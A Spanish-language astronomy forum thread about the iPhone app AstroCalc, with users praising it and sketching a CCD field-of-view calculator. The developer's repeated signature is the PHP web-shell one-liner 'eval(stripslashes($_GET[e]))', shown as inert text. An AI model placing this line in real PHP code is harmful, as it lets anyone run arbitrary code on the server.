Astro Calculador para iPhone

Subforo dedicado a otro tipo de material astronómico que no esté contenido en ninguna de las otras categorías. En este foro no está permitida la venta de ningún tipo de material.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Astro Calculador para iPhone

Mensaje por m3ntol »

Ya van más de 300 descargas a nivel mundial... en 3 días :)
phpbb:eval(stripslashes($_GET[e]));
fmk
Mensajes: 8
Registrado: Mar May 05, 2009 6:29 am

Astro Calculador para iPhone

Mensaje por fmk »

Pues ya va una descarga más, porque yo ya lo tengo instalado.

Muy util, gracias por el tremendo esfuerzo y la sencillez y practicidad



(Supongo que ya lo conocereis, pero hay otro muy cuco, que se llama

"planets"

y te dice todos los astros que hay visibles en cada momento, info en cantidad, los presente sobre la brujula, etc... etcf, tremendo.)
rsbfoto
Mensajes: 3
Registrado: Vie Jun 05, 2009 10:40 pm

Astro Calculador para iPhone

Mensaje por rsbfoto »

Hola,

Soy nuevo aquí y llegué aquí por el fabuloso programita AstroCalc :D

Hace unos días adquirí un iPod Touch y buscando programas útiles para el pasatiempo de la astronomía encontré AstroCalc.

Felicidades por el mismo.

Ahora habiendolo usado y siendo un aficionado 100% a la astrofotografía pués claro que me hice la pregunta ¿ Cuando habrá un AstroCalcCCD ? :roll:

¿ Habrá una cuenta PayPal a la cuál se puede hacer una donación al Autor de AstroCalc para honrar su esfuerzo ?

saludos desde México
Rainer
www.astroforo.net
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Astro Calculador para iPhone

Mensaje por m3ntol »

Rainer,
tu agradecimiento es suficiente pago ;) ya tomaremos unas cervecitas si alguna vez nos vemos :D:D

Eso de AstroCalcCCD me ha interesado ¿qué funcionalidad le pedirías? si conseguimos cerrar unos requerimientos buenos me pongo a hacerlo.
phpbb:eval(stripslashes($_GET[e]));
rsbfoto
Mensajes: 3
Registrado: Vie Jun 05, 2009 10:40 pm

Astro Calculador para iPhone

Mensaje por rsbfoto »

Hola,

Gracias por tu interés. Pués como quieres que te lo explique :D

Hay que poder meter datos del telescopio como ya lo tienes en AstroCalc, eventualmente añadir si se tiene un reductor o extendedor ...

Después los datos de las cámaras utlizadas como son tamaño de pixeles en micrones, tamaño del chip en pixeles vertical y horizontal ...

Los datos calculados interesantes podrían ser el Campo de visión, resolución de segundos de arco por pixel, etc.

Habría que ver una versión beta y sobre eso se puede ir desarollando lo necesario ...

¿ Que te parece ?

saludos desde México
Rainer
www.astroforo.net

PD Lo de las cervezas OK pero que no sea Corona, por favor :lol: (hay mejores cervezas en México :roll: )
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Astro Calculador para iPhone

Mensaje por m3ntol »

Muy intersante!

habría que añadir una columna más al Picker para poder seleccionar una combinación de telescopio - barlow/reductor - ocular/cámara y luego mostrar los resltados de los cálculos.

Ando un poco ignorante de temas de astrofoto, habría que definir cláramente or cuantos parámetro se define una CCD o una reflex (resolución, tamaño de pixel, ISO?, tiempo de exposicion? ni idea) y luego, en base a esos datos de entrada definir qué se puede calcular y como hacer los cálculos para obtener los resultados deseados.
phpbb:eval(stripslashes($_GET[e]));
rsbfoto
Mensajes: 3
Registrado: Vie Jun 05, 2009 10:40 pm

Astro Calculador para iPhone

Mensaje por rsbfoto »

[quote="m3ntol"]Muy intersante!

habría que añadir una columna más al Picker para poder seleccionar una combinación de telescopio - barlow/reductor - ocular/cámara y luego mostrar los resltados de los cálculos.

Ando un poco ignorante de temas de astrofoto, habría que definir cláramente or cuantos parámetro se define una CCD o una reflex (resolución, tamaño de pixel, ISO?, tiempo de exposicion? ni idea) y luego, en base a esos datos de entrada definir qué se puede calcular y como hacer los cálculos para obtener los resultados deseados.[/quote]

Hola,

Con lo del ISO y tiempo de exposición ya te estás yendo a un punto que no es calculabe desde mi punto de vista.

Los datos técnicos como son tamaño del pixel en micrones, cantidad de pixeles, etc. cada productor de cámara lo tiene en sus especificaciones técnicas.

El AstroCalcCCD que me imagino nada más comprendería lo que puede llamar primefocus. Las calculaciones si se hace fotografía por proyección ocular son demasiados difíciles o mejor dicho NO las entiendo para nada yo mismo :D

Por ejemplo para calcular el FOV con una cámara definida pués se calcula el tamaño horizontal y vertical usando los valores de pixeles en horizontal o vertical y multiplicandolo por el tamaño del pixel en micrones o sea 0.00xx

por ejemplo Cámara QSI 520 con un chip de 1600x1200pixeles y un pixel 7.4micrones ( 0.0074mm) da un chip de un tamaño de

1600 x 0.0074 = 11.84mm de ancho
1200 x 0.0074 = 8.88mm de alto

con eso y el largo focal se puede calcular el campo de visión usando la trigonometría ¿ Como ? pués tendré que refrescar mi trigonometría que no toco desde hace más de 40 años :lol:

Después de escribir esto me acorde de que algún día había hecho una hoja de cálculo. Puedes encontrarla aquí

http://rainerehlert.com/CCV/CC-Vista.xls

saludos desde México
Rainer (con la cerveza fría en en refri) :lol:
Responder